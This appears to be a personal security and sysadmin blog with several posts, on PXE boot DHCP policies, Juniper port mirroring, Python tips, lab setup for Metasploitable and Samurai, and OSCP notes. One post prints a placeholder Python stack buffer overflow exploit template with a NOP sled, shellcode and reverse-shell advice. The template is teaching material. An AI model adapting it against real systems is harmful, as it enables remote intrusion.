Monday, August 22, 2016

PXE Boot UEFI and BIOS at the Same Time? Yeah, it's possible.

Recently, I ran across an issue where I needed to PXE boot UEFI and BIOS on the same network with DHCP. With default options, it doesn't work very well. I'm sure there's some way around it, but it was painful for my Sysadmin to deal with.

Today, thanks to BranchCache Bob (https://www.youtube.com/watch?v=k5E97ndlRog), I was able to successfully make it work on Windows Server 2012 R2's DHCP server by setting up Policies.

A couple things:

1. You have to create DHCP Option 60 if it's not there already. On PXE servers that also have DHCP servers installed, this should be installed by default.
2. Option 60 needs to be given a value of "PXEClient", this is required for the UEFI boot process.
3. Don't set Option 60 for the BIOS side.

Now, with that out of the way, let's get to the biscuits and gravy of this...

SETTING UP THE VENDOR CLASSES - 

UEFI and BIOS send out specific information in the packets that the server parses and will help with the filtering later.

To setup the information for this, open the DHCP server, right click the IP class (in this case IPv4), then click "Define Vendor Classes..."



You'll need to add a new DHCP Vendor Class. Click Add, and type in the following information:

UEFI - 64-bit

* Display Name: PXEClient (UEFI x64)
* Description: PXEClient:Arch:00007
* ASCII: PXEClient:Arch:00007

(Note: The ASCII part will need to be typed in manually, and it is case sensitive)

UEFI - 32-bit

* Display Name: PXEClient (UEFI x86)
* Description: PXEClient:Arch:00006
* ASCII: PXEClient:Arch:00006

(Note: The ASCII part will need to be typed in manually, and it is case sensitive)

BIOS - 32 and 64-bit

* Display Name: PXEClient (BIOS x86 and x64)
* Description: PXEClient:Arch:00000
* ASCII: PXEClient:Arch:00000

(Note: The ASCII part will need to be typed in manually, and it is case sensitive)


The "PXEClient:Arch:0000x" is how the server understands what version of the WIM it's receiving, and is needed for the Policies setup in the next part.

The end result will look something like this:

Next, we need to setup the Policies...

POLICIES - 

*IMPORTANT* - Policies can be setup globally through the server, or by the scope. Choose wisely. 

Right click on Policies, click "New Policy..."

Add the following information:

UEFI - 64-bit

* Policy Name: PXEClient (UEFI x64)
* Description: Policy to setup correct server and files for UEFI x64
* Click Next
* Click Add
* Under "Value(s)", select "PXEClient (UEFI x64)", check the box for "Append wildcard(*)", then click Add, then OK
* Click Next
* Select DHCP Standard Options, then select:
     - Option 60 -"PXEClient"
     - Option 66 -
     - Option 67 -
* Click Next
* Make sure all the options look correct, then click Finish

UEFI - 32-bit

* Policy Name: PXEClient (UEFI x86)
* Description: Policy to setup correct server and files for UEFI x86
* Click Next
* Click Add
* Under "Value(s)", select "PXEClient (UEFI x86)", check the box for "Append wildcard(*)", then click Add, then OK
* Click Next
* Select DHCP Standard Options, then select:
     - Option 60 -"PXEClient"
     - Option 66 -
     - Option 67 -
* Click Next
* Make sure all the options look correct, then click Finish

BIOS - 32 and 64-bit

* Policy Name: PXEClient (BIOS x86 and x64)
* Description: Policy to setup correct server and files for BIOS x86 and x64
* Click Next
* Click Add
* Under "Value(s)", select "PXEClient (BIOS x86 and x64)", check the box for "Append wildcard(*)", then click Add, then OK
* Click Next
* Select DHCP Standard Options, then select:
     - **Option 60 is not needed here, don't put it in**
     - Option 66 -
     - Option 67 -
* Click Next
* Make sure all the options look correct, then click Finish

Now with all that setup, it's time to check the Scope Options...

SCOPE OPTIONS - 


The Scope Options should be setup automatically for the scope that the policy that was just setup is defined for. If the policies were setup at the server level, then they should appear in all scopes. 

If you previously defined any options for the scope that are now defined in the policies (for this, Option 60/66/67), you will need to delete them, otherwise it will not function. 

Good luck!

Friday, August 12, 2016

So, you wanna play with the Samurai web targets from Kali?

I wanted to play with the Samurai webapp targets from Kali (because I'm more familiar with Kali, of course), but I couldn't figure out how. They just didn't want to play nicely. Thanks to a good friend of mine that works for company undisclosed, errr, uhhhh...with Kevin Johnson, I got some tips on how to make this work.

Now, if you're a website admin, you probably know this already. I'm not.

Here's the fix:

On the Samurai VM, go to /etc/apache2/sites-available/ and get into the configs of each webapp. Inside you'll see something like this:


The "VirtualHost *IP address:port*" is where you'll change to your IP address you want. 

*EDIT:* You will also need to add the line: 

     ServerName <servername>

as well to the config file...I put mine after DocumentRoot.

Of course, you'll probably want to give yourself a static IP so that it doesn't change. VMware Workstation/Player can be a little finicky at times.

You should also notice that there are two different VirtualHosts here...one for port 80 and one for port 443. Change the IP on both.

Now, on your Kali box (or whatever you want to pentest/play with the webapps from), you'll need to set the hosts file up to point that webapp name to the IP address you placed in the file.

Voila! You're done.

Stay classy.
Aaron

Thursday, July 9, 2015

Port Mirroring on Juniper EX Series Switches

To setup port mirroring on the Juniper EX series switches, you should follow the guidelines here:

http://www.juniper.net/techpubs/en_US/junos13.2/topics/task/configuration/port-mirroring-cli.html

However, I'll TL;DR that for you here...

First, you need to setup your analyzer (the port mirror):

Set the analyzer up, "employee_monitor" is just the name of the analyzer...from there, input the port your trying to mirror, and make sure you get the packets coming in (ingress), going out (egress), or both (see below).

set ethernet-switching-options analyzer employee_monitor input ingress interface ge-0/0/47.0
set ethernet-switching-options analyzer employee_monitor input egress interface ge-0/0/47.0

Also, tell it what port you're pushing the traffic to (output).

set ethernet-switching-options analyzer employee_monitor output interface ge-0/0/46.0

Next, you set the firewall up to tell the packets to go to the analyzer. This is REQUIRED for the port mirror to work properly. 

set firewall family ethernet-switching filter employee_monitor term to-analyzer from interface ge-0/0/47.0
set firewall family ethernet-switching filter employee_monitor term to-analyzer then accept
set firewall family ethernet-switching filter employee_monitor term to-analyzer then analyzer employee_monitor


After that, you need to tell the port that it is an analyzer port now...
 
set interfaces ge-0/0/46 unit 0 family ethernet-switching filter input employee_monitor

That's it. Now you can setup something like Security Onion to monitor all your traffic! 

Aaron

Wednesday, July 8, 2015

Quick Tip: RegEx strings - changing "/" to "\" with re.sub() in Python

So, here's a quick tip on using Python and Regular Expressions to change a slash ("/") to a backslash ("\").

Here's the code, and I'll explain it afterwards:

>>> re.sub("/", '\\\\', "fooas/dsadsf")
'fooas\\dsadsf'
>>> print re.sub("/", '\\\\', "fooas/dsadsf")
fooas\dsadsf
>>> print re.sub("/", '\\\\', "fooas/dsa/d/sf")
fooas\dsa\d\sf
>>> print re.sub("/", '\\\\', data)
it\in\it

Notice that we're using 4x "\"'s to accomplish what we're trying to do. Now, remember this is Python we're dealing with, so the \ is an escape character for other uses, such as \t (tab), \r (carriage return), and \n (new line). 

With that being said, in Python strings, the representation of the \ character (to print it in the string) is "\\"...that is double backslash. So, when we go to replace one instance of a slash, we have to use 4 backslashes...why? 

Because the string representation in the RegEx needs to be escaped, and then the replaced string needs to be escaped too...more is less. So, 4x the backslashes looks like this "\\" and "\\" which then becomes "\\" in the replaced expression, which then becomes "\" in the string.

This concludes your lesson in confusing syntax for the day. Thanks for playing!

-A

Wednesday, June 24, 2015

Not So Quick and Dirty Python Raw Packet Sniffer

Ok, before I start this post, I have to give credit where credit is due...

The majority of this code (and where I learned to do it) came from the Cybrary.it Python for Security Professionals course by Joe Perry. Also, BIG thanks to Natron for reminding me of the .split() function of strings. Man, that one took a couple hours. :-(

However, some of it was tweaked by me, and I added a little more functionality to it than it had before, and frankly, I'm proud that I was able to follow through on this.

I'm not a coder, you see, and I don't even play one on TV. Yet. (**Note to self, see if Scorpion needs a new fat guy...)

Anyway, before I digress any further, let me share my version of the Not So Quick and Dirty Raw Socket Packet Sniffer, or the NSQDRSPS. I think that needs a new acronym. Ahem.

You'll see (if you went through the course) that I added the ICMP breakdown, and the hex coding of the data after the headers, so you can see what you're looking at. It may not be the prettiest, or the most eloquent (I might work on that later, this is Python after all), but it functions pretty well.

Note: You have to run this on a OS that can use raw sockets (read: NOT Windows).

Find the code here: https://github.com/Bl0ckbuster/Repo/blob/master/Aaron_Sniffer.py

Enjoy everyone, and if you run it, please let me know what you think. Changes? Requests? Etc? I'd love to hear from you.

Aaron

Thursday, April 16, 2015

Quick Note - Jumbo Frames

When you're setting up Jumbo Frames for your SAN network, make sure that your switch is set with a higher MTU than your SAN/vSwitch. If it's not, it will cause problems.

A good option for this:

9000 - SAN
9000 - vSwitch
9216 - physical switch

Sigh.

Thursday, March 12, 2015

Quick and Dirty Python Exploit Development

Ok, this post is about how to quickly code an exploit (read: Stack buffer overflow) in your favorite language and mine, Python.

Wait, it's not your FAVORITE language? Seriously?

Well, that's ok, we can still be friends.

This code assumes a couple things, namely:
1) You know a thing or two about Python
2) You understand how TCP/IP works
3) You understand what sockets are
4) You understand stack overflows
5) You have certain information from fuzzing, such as the address of ESP/EIP

If none of this makes sense to you, then head on over to https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ and discover a new world of exploit development!

Anyway, this will give you a simple outline in Python on how to code an exploit quickly, once you have that certain information you need that I mentioned above. I'll outline it, and then explain what each piece does after that.

Let's begin!

Code (without comments/explanation):

#!/usr/bin/python

import socket
import sys

retaddress = "<return address here>"

shellcode = "<shellcode here>"

buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try: 
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()

try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."

sock.close()

-------------------------------------------
Code (with comments/explanation): 

#!/usr/bin/python

# Import the "socket" library, necessary for any network functionality
# Import the "sys" library, necessary for accessing local system functionality

import socket
import sys

'''

"retaddress" is the return address where the shellcode will be located on the stack, i.e., ESP (Extended Stack Pointer)...
You're putting this address in at EIP (Extended Instruction Pointer).

In other words, you're overwriting EIP with the address you want the code to jump to. 
Remember that Intel x86 is Little Endian, so write the address backwards. For example, if your return address is AABBCCDD, put the address below as "\xDD\xCC\xBB\xAA"

'''

retaddress = <put an address here> 

'''
Shellcode goes here...if you're skilled enough to write your own, let's face it, you probably aren't reading this.

Use Metasploit's msfpayload/msfvenom to create shellcode, then make sure you have the appropriate listener setup to catch the shell, such as Metasploit's multi/handler or netcat/ncat.
'''

shellcode = <shellcode here>

'''
Setup the buffer that we'll send over the socket...

<number here> is the number of bytes that it takes to control EIP, then we put our shellcode after that...

Note that the NOP sled ("\x90" * 16) is optional, depending on how much room you have in the buffer...this will depend on the application
'''

buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode 

# Now we'll setup the socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Make sure that the IP address and port number are put in
# If they aren't, then print the Usage, and exit

try: 
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()
# Open the socket, send the exploit, go from there

try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."

# Should be obvious here, close the socket connection
sock.close()


I hope this helped anyone trying to quickly code an exploit in Python...if you have questions or concerns, leave them in the comments.

Night everyone!
- Aaron

Wednesday, March 11, 2015

The Hackers OST still rocks...and other things.

Yeah, I said it. The Hackers soundtrack still rocks. I just found "Cowgirl" again while watching G0tmi1k's video on Tomcat exploitation. As I watched that video, I realized that Tomcat was indeed hackable. I hadn't played with it much before, but I'm definitely going to now.

There is a lot that I have learned that I don't know about MySQL and web app hacking, which brought me to G0tmi1k's video that I linked...and with that being said, I have decided that I will try to post little tidbits here and there about the process of learning Webapp hacking. So, with that being said, there may be long posts on here, or this could be a spot for me to place random info that I've picked up here and there. Enjoy!

-A

Friday, March 6, 2015

Mutillidae and Metasploitable2 errors

I found this just now over at http://colesec.inventedtheinternet.com/metasploitable-2-and-mutillidae/

If you're having issues with getting Mutillidae working on Metasploitable2 (let's face it, it's free and fast to setup and play with to get hacking away at something), then you'll notice that there are errors on some pages, specifically when you try to do any SQL injection. This is because the wrong database name is specified in the Mutillidae config file.

Here's the fix.

First, root the box. If you WANT to use Metasploit to do that, then do it. It's fun, and that's what it's there for. However, the easy way is to use "sudo su", put in the password, and then get to this directory: /var/www/mutillidae

config.inc Before
After that, find the config.inc file, and update the $dbname to "owasp10".



Yes, I use nano. I like it. So there.

Anyway, after updating, then you shouldn't have any issues getting Mutillidae to work in Metasploitable2.

For more information on Mutillidae, see Irongeek's site.
For more info on Metasploitable, see Rapid7's site.

For hacking away at Mutillidae, see webpwnized's Youtube channel. Great stuff there.

Stay classy!
Aaron

Moar blogging.

I realized a bit ago that I need to add more content. Really start sharing my thoughts...well, that's actually probably not a great idea.

Ahem.

Anyway, a couple quick notes. I passed the OSCP back in January. This was a great course, and I wish I could write reviews like so many others have done, but I'm not much of a writer, as you have probably seen from the lack of other posts on this blog. :-/

I will say that it challenged me in areas that I didn't know existed, and changed my whole thought process about how to attack a network, or, well, really anything.

I TRULY understand the meaning of Try Harder now.

Also, BSides Oklahoma is coming along nicely, a small group of us are working on getting it together, and it seems to be really pulling together. If you're interested, see our Wiki page, and SEND THOSE PAPERS! The CFP is now open, and entries are being reviewed as they come in.

I'm currently working on the t-shirts and stickers, so if they look awful, well, it's probably my fault. Heh. :-)

Anyway, as other stuff comes up, I'll be writing more. If any of you out there are actually reading this, and want to see something, ping me in the comments and let me know what you would like to see me write about. I'm not great at creativity, but I can try. Later.

-A